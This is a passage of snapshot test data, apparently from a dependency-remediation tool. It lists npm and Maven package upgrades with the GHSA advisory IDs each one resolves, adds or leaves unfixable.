634 ] } ] }, { "Patch": { "Pkg": { "System": 3, "Name": "path-parse" }, "OrigVersion": "1.0.6", "NewVersion": "1.0.7" }, "Resolved": [ { "ID": "GHSA-hj48-42vr-x3v9", "AffectedNodes": [ 398 ] } ] }, { "Patch": { "Pkg": { "System": 3, "Name": "pathval" }, "OrigVersion": "1.1.0", "NewVersion": "1.1.1" }, "Resolved": [ { "ID": "GHSA-g6ww-v8xp-vmwg", "AffectedNodes": [ 400 ] } ] }, { "Patch": { "Pkg": { "System": 3, "Name": "qs" }, "OrigVersion": "6.5.2", "NewVersion": "6.5.3" }, "Resolved": [ { "ID": "GHSA-hrpp-h998-j3pp", "AffectedNodes": [ 422 ] } ] }, { "Patch": { "Pkg": { "System": 3, "Name": "rollup" }, "OrigVersion": "2.59.0", "NewVersion": "2.79.2" }, "Resolved": [ { "ID": "GHSA-gcx4-mw62-g8wm", "AffectedNodes": [ 444 ] } ] }, { "Patch": { "Pkg": { "System": 3, "Name": "semver" }, "OrigVersion": "5.5.1", "NewVersion": "5.7.2" }, "Resolved": [ { "ID": "GHSA-c2qf-rxjj-qqgw", "AffectedNodes": [ 449 ] } ] }, { "Patch": { "Pkg": { "System": 3, "Name": "semver" }, "OrigVersion": "5.6.0", "NewVersion": "5.7.2" }, "Resolved": [ { "ID": "GHSA-c2qf-rxjj-qqgw", "AffectedNodes": [ 539, 572 ] } ] }, { "Patch": { "Pkg": { "System": 3, "Name": "semver" }, "OrigVersion": "6.3.0", "NewVersion": "6.3.1" }, "Resolved": [ { "ID": "GHSA-c2qf-rxjj-qqgw", "AffectedNodes": [ 571 ] } ] }, { "Patch": { "Pkg": { "System": 3, "Name": "y18n" }, "OrigVersion": "4.0.0", "NewVersion": "4.0.3" }, "Resolved": [ { "ID": "GHSA-c4w7-xm78-47vh", "AffectedNodes": [ 518 ] } ] } ], "Unfixable": [ { "ID": "GHSA-2r2c-g63r-vccr", "AffectedNodes": [ 366 ] }, { "ID": "GHSA-3wf4-68gx-mph8", "AffectedNodes": [ 255 ] }, { "ID": "GHSA-3xgq-45jj-v275", "AffectedNodes": [ 575 ] }, { "ID": "GHSA-4wf5-vphf-c2xc", "AffectedNodes": [ 470 ] }, { "ID": "GHSA-52f5-9888-hmc6", "AffectedNodes": [ 472 ] }, { "ID": "GHSA-566m-qj78-rww5", "AffectedNodes": [ 406 ] }, { "ID": "GHSA-5rrq-pxf6-6jx5", "AffectedNodes": [ 366 ] }, { "ID": "GHSA-67hx-6x53-jw92", "AffectedNodes": [ 71 ] }, { "ID": "GHSA-72xf-g2v4-qvf3", "AffectedNodes": [ 475 ] }, { "ID": "GHSA-72xf-g2v4-qvf3", "AffectedNodes": [ 607 ] }, { "ID": "GHSA-72xf-g2v4-qvf3", "AffectedNodes": [ 652 ] }, { "ID": "GHSA-7fh5-64p2-3v2j", "AffectedNodes": [ 406 ] }, { "ID": "GHSA-7v5v-9h63-cj86", "AffectedNodes": [ 109 ] }, { "ID": "GHSA-896r-f27r-55mw", "AffectedNodes": [ 326 ] }, { "ID": "GHSA-8fr3-hfg3-gpgp", "AffectedNodes": [ 366 ] }, { "ID": "GHSA-968p-4wvh-cqc8", "AffectedNodes": [ 24 ] }, { "ID": "GHSA-9wv6-86v2-598j", "AffectedNodes": [ 399 ] }, { "ID": "GHSA-cfm4-qjh2-4765", "AffectedNodes": [ 366 ] }, { "ID": "GHSA-f8q6-p94x-37v3", "AffectedNodes": [ 356 ] }, { "ID": "GHSA-fjxv-7rqg-78g4", "AffectedNodes": [ 257 ] }, { "ID": "GHSA-g954-5hwp-pp24", "AffectedNodes": [ 415 ] }, { "ID": "GHSA-gcx4-mw62-g8wm", "AffectedNodes": [ 605 ] }, { "ID": "GHSA-gf8q-jrpm-jvxq", "AffectedNodes": [ 366 ] }, { "ID": "GHSA-grv7-fg5c-xmjg", "AffectedNodes": [ 163 ] }, { "ID": "GHSA-h755-8qp9-cq85", "AffectedNodes": [ 415 ] }, { "ID": "GHSA-hwj9-h5mp-3pm3", "AffectedNodes": [ 406 ] }, { "ID": "GHSA-p8p7-x288-28g6", "AffectedNodes": [ 436 ] }, { "ID": "GHSA-p9pc-299p-vxgp", "AffectedNodes": [ 521 ] }, { "ID": "GHSA-pfq8-rq6v-vf5m", "AffectedNodes": [ 291 ] }, { "ID": "GHSA-r683-j2x4-v87g", "AffectedNodes": [ 365 ] }, { "ID": "GHSA-v88g-cgmw-v5xw", "AffectedNodes": [ 138 ] }, { "ID": "GHSA-vh5w-fg69-rc8m", "AffectedNodes": [ 278 ] }, { "ID": "GHSA-vh95-rmgr-6w4m", "AffectedNodes": [ 615 ] }, { "ID": "GHSA-w8qv-6jwh-64r5", "AffectedNodes": [ 166 ] }, { "ID": "GHSA-w8qv-6jwh-64r5", "AffectedNodes": [ 560 ] }, { "ID": "GHSA-x4jg-mjrx-434g", "AffectedNodes": [ 366 ] }, { "ID": "GHSA-xvch-5gv4-984h", "AffectedNodes": [ 615 ] } ] } --- ================================================ FILE: internal/remediation/__snapshots__/testhelpers_test.snap ================================================ [TestComputeOverridePatches/maven-classifier - 1] [ { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "org.apache.commons:commons-lang3" }, "Type": {}, "OrigRequire": "", "NewRequire": "3.18.0", "OrigResolved": "3.5", "NewResolved": "3.18.0" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-j288-q9x7-2f5v", "AffectedNodes": [ 2 ] } ], "AddedVulns": [] } ] --- [TestComputeOverridePatches/maven-management-only - 1] [ { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "org.apache.commons:commons-configuration2" }, "Type": {}, "OrigRequire": "", "NewRequire": "2.10.1", "OrigResolved": "2.8.0", "NewResolved": "2.10.1" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-9w38-p64v-xpmv", "AffectedNodes": [ 16 ] }, { "ID": "GHSA-xjp4-hw94-mvp5", "AffectedNodes": [ 16 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "org.apache.shiro:shiro-web" }, "Type": {}, "OrigRequire": "", "NewRequire": "1.13.0", "OrigResolved": "1.10.0", "NewResolved": "1.13.0" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-hhw5-c326-822h", "AffectedNodes": [ 23 ] }, { "ID": "GHSA-pmhc-2g4f-85cg", "AffectedNodes": [ 23 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "commons-io:commons-io" }, "Type": {}, "OrigRequire": "", "NewRequire": "2.14.0", "OrigResolved": "2.7", "NewResolved": "2.14.0" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-78wr-2p64-hpwj", "AffectedNodes": [ 19 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "org.apache.shiro:shiro-core" }, "Type": {}, "OrigRequire": "", "NewRequire": "1.13.0", "OrigResolved": "1.10.0", "NewResolved": "1.13.0" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-jc7h-c423-mpjc", "AffectedNodes": [ 22 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "org.apache.shiro:shiro-web" }, "Type": {}, "OrigRequire": "", "NewRequire": "1.12.0", "OrigResolved": "1.10.0", "NewResolved": "1.12.0" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-pmhc-2g4f-85cg", "AffectedNodes": [ 23 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "org.apache.thrift:libthrift" }, "Type": {}, "OrigRequire": "", "NewRequire": "0.14.0", "OrigResolved": "0.13.0", "NewResolved": "0.14.0" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-g2fg-mr77-6vrm", "AffectedNodes": [ 6 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "org.apache.commons:commons-lang3" }, "Type": {}, "OrigRequire": "", "NewRequire": "3.18.0", "OrigResolved": "3.12.0", "NewResolved": "3.18.0" } ], "EcosystemSpecific": null }, "RemovedVulns": [], "AddedVulns": [] } ] --- [TestComputeOverridePatches/maven-zeppelin-server - 1] [ { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "org.apache.zeppelin:zeppelin-interpreter" }, "Type": {}, "OrigRequire": "", "NewRequire": "0.12.0", "OrigResolved": "0.11.1", "NewResolved": "0.12.0" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-2fqw-684c-pvp7", "AffectedNodes": [ 123 ] }, { "ID": "GHSA-389x-839f-4rhx", "AffectedNodes": [ 278 ] }, { "ID": "GHSA-3p8m-j85q-pgmj", "AffectedNodes": [ 256 ] }, { "ID": "GHSA-4jhc-wjr3-pwh2", "AffectedNodes": [ 123 ] }, { "ID": "GHSA-5mg8-w23w-74h3", "AffectedNodes": [ 260 ] }, { "ID": "GHSA-6mjq-h674-j845", "AffectedNodes": [ 257 ] }, { "ID": "GHSA-6vvh-5794-vpmj", "AffectedNodes": [ 123 ] }, { "ID": "GHSA-7fr2-94h7-ccg2", "AffectedNodes": [ 123 ] }, { "ID": "GHSA-7g45-4rm6-3mm3", "AffectedNodes": [ 260 ] }, { "ID": "GHSA-7pgf-ppxw-8624", "AffectedNodes": [ 39 ] }, { "ID": "GHSA-g7p8-r2ch-4rmf", "AffectedNodes": [ 123 ] }, { "ID": "GHSA-m4h3-7mc2-v295", "AffectedNodes": [ 123 ] }, { "ID": "GHSA-mf27-wg66-m8f5", "AffectedNodes": [ 123 ] }, { "ID": "GHSA-mm9x-g8pc-w292", "AffectedNodes": [ 257 ] }, { "ID": "GHSA-mvr2-9pj6-7w5j", "AffectedNodes": [ 260 ] }, { "ID": "GHSA-xq3w-v528-46rv", "AffectedNodes": [ 278 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "io.atomix:atomix" }, "Type": {}, "OrigRequire": "", "NewRequire": "3.1.6", "OrigResolved": "3.0.0-rc5", "NewResolved": "3.1.6" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-2fqw-684c-pvp7", "AffectedNodes": [ 123 ] }, { "ID": "GHSA-4jhc-wjr3-pwh2", "AffectedNodes": [ 123 ] }, { "ID": "GHSA-6vvh-5794-vpmj", "AffectedNodes": [ 123 ] }, { "ID": "GHSA-7fr2-94h7-ccg2", "AffectedNodes": [ 123 ] }, { "ID": "GHSA-g7p8-r2ch-4rmf", "AffectedNodes": [ 123 ] }, { "ID": "GHSA-m4h3-7mc2-v295", "AffectedNodes": [ 123 ] }, { "ID": "GHSA-mf27-wg66-m8f5", "AffectedNodes": [ 123 ] } ], "AddedVulns": [ { "ID": "GHSA-v2xm-76pq-phcf", "AffectedNodes": [ 264 ] } ] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "io.netty:netty-handler" }, "Type": {}, "OrigRequire": "", "NewRequire": "4.1.118.Final", "OrigResolved": "4.1.27.Final", "NewResolved": "4.1.118.Final" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-389x-839f-4rhx", "AffectedNodes": [ 278 ] }, { "ID": "GHSA-6mjq-h674-j845", "AffectedNodes": [ 257 ] }, { "ID": "GHSA-mm9x-g8pc-w292", "AffectedNodes": [ 257 ] }, { "ID": "GHSA-xq3w-v528-46rv", "AffectedNodes": [ 278 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "org.apache.pdfbox:pdfbox" }, "Type": {}, "OrigRequire": "", "NewRequire": "2.0.24", "OrigResolved": "2.0.16", "NewResolved": "2.0.24" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-2h3j-m7gr-25xj", "AffectedNodes": [ 287 ] }, { "ID": "GHSA-6vqp-h455-42mr", "AffectedNodes": [ 287 ] }, { "ID": "GHSA-7grw-6pjh-jpc9", "AffectedNodes": [ 287 ] }, { "ID": "GHSA-fg3j-q579-v8x4", "AffectedNodes": [ 287 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "xerces:xercesImpl" }, "Type": {}, "OrigRequire": "", "NewRequire": "2.12.2", "OrigResolved": "2.11.0", "NewResolved": "2.12.2" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-7j4h-8wpf-rqfh", "AffectedNodes": [ 252 ] }, { "ID": "GHSA-h65f-jvqw-m9fj", "AffectedNodes": [ 252 ] }, { "ID": "GHSA-vmqm-g3vh-847m", "AffectedNodes": [ 252 ] }, { "ID": "GHSA-w4jq-qh47-hvjq", "AffectedNodes": [ 252 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "io.atomix:atomix" }, "Type": {}, "OrigRequire": "", "NewRequire": "3.1.6", "OrigResolved": "3.0.0-rc5", "NewResolved": "3.1.6" }, { "Pkg": { "System": 6, "Name": "io.github.classgraph:classgraph" }, "Type": {}, "OrigRequire": "", "NewRequire": "4.8.112", "OrigResolved": "4.2.3", "NewResolved": "4.8.112" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-2fqw-684c-pvp7", "AffectedNodes": [ 123 ] }, { "ID": "GHSA-4jhc-wjr3-pwh2", "AffectedNodes": [ 123 ] }, { "ID": "GHSA-6vvh-5794-vpmj", "AffectedNodes": [ 123 ] }, { "ID": "GHSA-7fr2-94h7-ccg2", "AffectedNodes": [ 123 ] }, { "ID": "GHSA-g7p8-r2ch-4rmf", "AffectedNodes": [ 123 ] }, { "ID": "GHSA-m4h3-7mc2-v295", "AffectedNodes": [ 123 ] }, { "ID": "GHSA-mf27-wg66-m8f5", "AffectedNodes": [ 123 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "com.google.guava:guava" }, "Type": {}, "OrigRequire": "", "NewRequire": "32.0.0-jre", "OrigResolved": "22.0", "NewResolved": "32.0.0-jre" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-5mg8-w23w-74h3", "AffectedNodes": [ 260 ] }, { "ID": "GHSA-7g45-4rm6-3mm3", "AffectedNodes": [ 260 ] }, { "ID": "GHSA-mvr2-9pj6-7w5j", "AffectedNodes": [ 260 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "io.netty:netty-codec" }, "Type": {}, "OrigRequire": "", "NewRequire": "4.1.125.Final", "OrigResolved": "4.1.27.Final", "NewResolved": "4.1.125.Final" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-389x-839f-4rhx", "AffectedNodes": [ 278 ] }, { "ID": "GHSA-3p8m-j85q-pgmj", "AffectedNodes": [ 256 ] }, { "ID": "GHSA-xq3w-v528-46rv", "AffectedNodes": [ 278 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "org.apache.mina:mina-core" }, "Type": {}, "OrigRequire": "", "NewRequire": "2.0.27", "OrigResolved": "2.0.7", "NewResolved": "2.0.27" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-5h29-qq92-wj7f", "AffectedNodes": [ 167 ] }, { "ID": "GHSA-6mcm-j9cj-3vc3", "AffectedNodes": [ 167 ] }, { "ID": "GHSA-76h9-2vwh-w278", "AffectedNodes": [ 167 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "org.eclipse.jgit:org.eclipse.jgit" }, "Type": {}, "OrigRequire": "", "NewRequire": "6.10.1.202505221210-r", "OrigResolved": "4.5.4.201711221230-r", "NewResolved": "6.10.1.202505221210-r" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-3p86-9955-h393", "AffectedNodes": [ 56 ] }, { "ID": "GHSA-q446-82vq-w674", "AffectedNodes": [ 151 ] }, { "ID": "GHSA-vrpq-qp53-qv56", "AffectedNodes": [ 56 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "xerces:xercesImpl" }, "Type": {}, "OrigRequire": "", "NewRequire": "2.12.1", "OrigResolved": "2.11.0", "NewResolved": "2.12.1" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-7j4h-8wpf-rqfh", "AffectedNodes": [ 252 ] }, { "ID": "GHSA-vmqm-g3vh-847m", "AffectedNodes": [ 252 ] }, { "ID": "GHSA-w4jq-qh47-hvjq", "AffectedNodes": [ 252 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "com.fasterxml.jackson.core:jackson-core" }, "Type": {}, "OrigRequire": "", "NewRequire": "2.15.0", "OrigResolved": "2.12.6", "NewResolved": "2.15.0" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-h46c-h94j-95f3", "AffectedNodes": [ 78 ] }, { "ID": "GHSA-wf8f-6423-gfxg", "AffectedNodes": [ 78 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "com.fasterxml.jackson.core:jackson-databind" }, "Type": {}, "OrigRequire": "", "NewRequire": "2.12.7.1", "OrigResolved": "2.12.6.1", "NewResolved": "2.12.7.1" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-jjjh-jjxp-wpff", "AffectedNodes": [ 15 ] }, { "ID": "GHSA-rgv9-q543-rqg4", "AffectedNodes": [ 15 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "com.nimbusds:nimbus-jose-jwt" }, "Type": {}, "OrigRequire": "", "NewRequire": "9.37.4", "OrigResolved": "9.13", "NewResolved": "9.37.4" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-gvpg-vgmx-xg6w", "AffectedNodes": [ 28 ] }, { "ID": "GHSA-xwmg-2g98-w7v9", "AffectedNodes": [ 28 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "io.netty:netty-common" }, "Type": {}, "OrigRequire": "", "NewRequire": "4.1.118.Final", "OrigResolved": "4.1.27.Final", "NewResolved": "4.1.118.Final" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-389x-839f-4rhx", "AffectedNodes": [ 278 ] }, { "ID": "GHSA-xq3w-v528-46rv", "AffectedNodes": [ 278 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "org.apache.commons:commons-compress" }, "Type": {}, "OrigRequire": "", "NewRequire": "1.26.0", "OrigResolved": "1.21", "NewResolved": "1.26.0" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-4265-ccf5-phj5", "AffectedNodes": [ 59 ] }, { "ID": "GHSA-4g9r-vxhx-9pgx", "AffectedNodes": [ 59 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "org.apache.commons:commons-configuration2" }, "Type": {}, "OrigRequire": "", "NewRequire": "2.10.1", "OrigResolved": "2.8.0", "NewResolved": "2.10.1" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-9w38-p64v-xpmv", "AffectedNodes": [ 127 ] }, { "ID": "GHSA-xjp4-hw94-mvp5", "AffectedNodes": [ 127 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "org.apache.commons:commons-vfs2" }, "Type": {}, "OrigRequire": "", "NewRequire": "2.10.0", "OrigResolved": "2.6.0", "NewResolved": "2.10.0" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-3936-3gx6-49c4", "AffectedNodes": [ 55 ] }, { "ID": "GHSA-9q4x-fr4m-jp86", "AffectedNodes": [ 55 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "org.apache.mina:mina-core" }, "Type": {}, "OrigRequire": "", "NewRequire": "2.0.22", "OrigResolved": "2.0.7", "NewResolved": "2.0.22" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-5h29-qq92-wj7f", "AffectedNodes": [ 167 ] }, { "ID": "GHSA-6mcm-j9cj-3vc3", "AffectedNodes": [ 167 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "org.apache.pdfbox:pdfbox" }, "Type": {}, "OrigRequire": "", "NewRequire": "2.0.23", "OrigResolved": "2.0.16", "NewResolved": "2.0.23" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-2h3j-m7gr-25xj", "AffectedNodes": [ 287 ] }, { "ID": "GHSA-6vqp-h455-42mr", "AffectedNodes": [ 287 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "org.apache.shiro:shiro-web" }, "Type": {}, "OrigRequire": "", "NewRequire": "1.13.0", "OrigResolved": "1.10.0", "NewResolved": "1.13.0" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-hhw5-c326-822h", "AffectedNodes": [ 21 ] }, { "ID": "GHSA-pmhc-2g4f-85cg", "AffectedNodes": [ 21 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "org.eclipse.jetty:jetty-server" }, "Type": {}, "OrigRequire": "", "NewRequire": "9.4.57.v20241219", "OrigResolved": "9.4.52.v20230823", "NewResolved": "9.4.57.v20241219" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-g8m5-722r-8whq", "AffectedNodes": [ 243 ] }, { "ID": "GHSA-q4rv-gq96-w7c5", "AffectedNodes": [ 243 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "org.eclipse.jgit:org.eclipse.jgit" }, "Type": {}, "OrigRequire": "", "NewRequire": "5.13.3.202401111512-r", "OrigResolved": "4.5.4.201711221230-r", "NewResolved": "5.13.3.202401111512-r" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-3p86-9955-h393", "AffectedNodes": [ 56 ] }, { "ID": "GHSA-q446-82vq-w674", "AffectedNodes": [ 151 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "xerces:xercesImpl" }, "Type": {}, "OrigRequire": "", "NewRequire": "2.12.0", "OrigResolved": "2.11.0", "NewResolved": "2.12.0" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-7j4h-8wpf-rqfh", "AffectedNodes": [ 252 ] }, { "ID": "GHSA-vmqm-g3vh-847m", "AffectedNodes": [ 252 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "commons-net:commons-net" }, "Type": {}, "OrigRequire": "", "NewRequire": "3.9.0", "OrigResolved": "3.6", "NewResolved": "3.9.0" }, { "Pkg": { "System": 6, "Name": "net.sourceforge.htmlunit:htmlunit" }, "Type": {}, "OrigRequire": "", "NewRequire": "2.37.0", "OrigResolved": "2.18", "NewResolved": "2.37.0" }, { "Pkg": { "System": 6, "Name": "net.sourceforge.htmlunit:neko-htmlunit" }, "Type": {}, "OrigRequire": "", "NewRequire": "2.61.0", "OrigResolved": "2.37.0", "NewResolved": "2.61.0" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-5mh9-r3rr-9597", "AffectedNodes": [ 173 ] }, { "ID": "GHSA-7j4h-8wpf-rqfh", "AffectedNodes": [ 252 ] }, { "ID": "GHSA-h65f-jvqw-m9fj", "AffectedNodes": [ 252 ] }, { "ID": "GHSA-vmqm-g3vh-847m", "AffectedNodes": [ 252 ] }, { "ID": "GHSA-w4jq-qh47-hvjq", "AffectedNodes": [ 252 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "net.sourceforge.htmlunit:htmlunit" }, "Type": {}, "OrigRequire": "", "NewRequire": "2.37.0", "OrigResolved": "2.18", "NewResolved": "2.37.0" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-5mh9-r3rr-9597", "AffectedNodes": [ 173 ] }, { "ID": "GHSA-7j4h-8wpf-rqfh", "AffectedNodes": [ 252 ] }, { "ID": "GHSA-vmqm-g3vh-847m", "AffectedNodes": [ 252 ] } ], "AddedVulns": [ { "ID": "GHSA-6jmm-mp6w-4rrg", "AffectedNodes": [ 252 ] }, { "ID": "GHSA-cgp8-4m63-fhh5", "AffectedNodes": [ 254 ] } ] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "io.netty:netty-handler" }, "Type": {}, "OrigRequire": "", "NewRequire": "4.1.94.Final", "OrigResolved": "4.1.27.Final", "NewResolved": "4.1.94.Final" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-6mjq-h674-j845", "AffectedNodes": [ 257 ] }, { "ID": "GHSA-mm9x-g8pc-w292", "AffectedNodes": [ 257 ] } ], "AddedVulns": [ { "ID": "GHSA-4g8c-wm8x-jfhw", "AffectedNodes": [ 257 ] } ] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "com.fasterxml.jackson.core:jackson-core" }, "Type": {}, "OrigRequire": "", "NewRequire": "2.13.0", "OrigResolved": "2.12.6", "NewResolved": "2.13.0" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-wf8f-6423-gfxg", "AffectedNodes": [ 78 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "com.google.guava:guava" }, "Type": {}, "OrigRequire": "", "NewRequire": "24.1.1-jre", "OrigResolved": "22.0", "NewResolved": "24.1.1-jre" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-mvr2-9pj6-7w5j", "AffectedNodes": [ 260 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "com.jcraft:jsch" }, "Type": {}, "OrigRequire": "", "NewRequire": "0.1.54", "OrigResolved": "0.1.53", "NewResolved": "0.1.54" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-q446-82vq-w674", "AffectedNodes": [ 151 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "com.nimbusds:nimbus-jose-jwt" }, "Type": {}, "OrigRequire": "", "NewRequire": "9.37.2", "OrigResolved": "9.13", "NewResolved": "9.37.2" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-gvpg-vgmx-xg6w", "AffectedNodes": [ 28 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "commons-beanutils:commons-beanutils" }, "Type": {}, "OrigRequire": "", "NewRequire": "1.11.0", "OrigResolved": "1.9.4", "NewResolved": "1.11.0" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-wxr5-93ph-8wr9", "AffectedNodes": [ 20 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "commons-io:commons-io" }, "Type": {}, "OrigRequire": "", "NewRequire": "2.14.0", "OrigResolved": "2.7", "NewResolved": "2.14.0" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-78wr-2p64-hpwj", "AffectedNodes": [ 42 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "io.netty:netty" }, "Type": {}, "OrigRequire": "", "NewRequire": "3.9.8.Final", "OrigResolved": "3.5.2.Final", "NewResolved": "3.9.8.Final" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-xfv3-rrfm-f2rv", "AffectedNodes": [ 175 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "io.netty:netty-common" }, "Type": {}, "OrigRequire": "", "NewRequire": "4.1.115.Final", "OrigResolved": "4.1.27.Final", "NewResolved": "4.1.115.Final" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-xq3w-v528-46rv", "AffectedNodes": [ 278 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "io.netty:netty-handler" }, "Type": {}, "OrigRequire": "", "NewRequire": "4.1.46.Final", "OrigResolved": "4.1.27.Final", "NewResolved": "4.1.46.Final" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-mm9x-g8pc-w292", "AffectedNodes": [ 257 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "org.apache.directory.api:api-ldap-model" }, "Type": {}, "OrigRequire": "", "NewRequire": "1.0.0-M31", "OrigResolved": "1.0.0-M20", "NewResolved": "1.0.0-M31" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-cx3q-cv6w-mx4h", "AffectedNodes": [ 104 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "org.apache.jackrabbit:jackrabbit-jcr-commons" }, "Type": {}, "OrigRequire": "", "NewRequire": "2.22.2", "OrigResolved": "1.6.5", "NewResolved": "2.22.2" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-cxvc-g8f2-4gmm", "AffectedNodes": [ 241 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": 